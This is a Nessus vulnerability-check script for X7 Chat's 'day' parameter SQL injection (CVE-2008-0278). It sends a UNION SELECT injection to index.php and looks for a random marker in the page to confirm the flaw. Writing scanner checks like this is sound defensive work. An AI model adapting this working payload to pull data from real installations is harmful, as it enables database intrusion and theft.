#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29981);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2008-0278");
  script_bugtraq_id(27277);
  script_xref(name:"OSVDB", value:"40252");

  script_name(english:"X7 Chat day Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to influence an event listing");

  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
SQL injection attack. 

Description :

The remote host is running X7 Chat, a web-based chat program written
in PHP. 

The version of X7 Chat installed on the remote host fails to sanitize
input to the 'day' parameter of the 'index.php' script when 'page' is
set to 'event' before using it in 'sources/info_box.php' to construct
database queries.  Regardless of PHP's 'magic_quotes_gpc' setting, an
attacker may be able to exploit this issue to manipulate database
queries to disclose sensitive information, bypass authentication,
modify data, or even attack the underlying database. 

See also :

http://www.milw0rm.com/exploits/4907
http://x7chat.com/support_forum/index.php?topic=3287.0

Solution :

Upgrade to X7 Chat 2.0.5.1 or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/x7chat", "/chat", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to manipulate an event listing.
  magic1 = unixtime();
  magic2 = rand();
  exploit = string("-1 UNION SELECT 1,", magic1,",", magic2, " --");

  req = http_get(
    item:string(
      dir, "/index.php?",
      "act=sm_window&",
      "page=event&",
      "day=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our "event".
  if (
    'Powered By <a href="http://www.x7chat.com/' >< res &&
    string(" : </b>", magic2, "<Br><Br>") >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
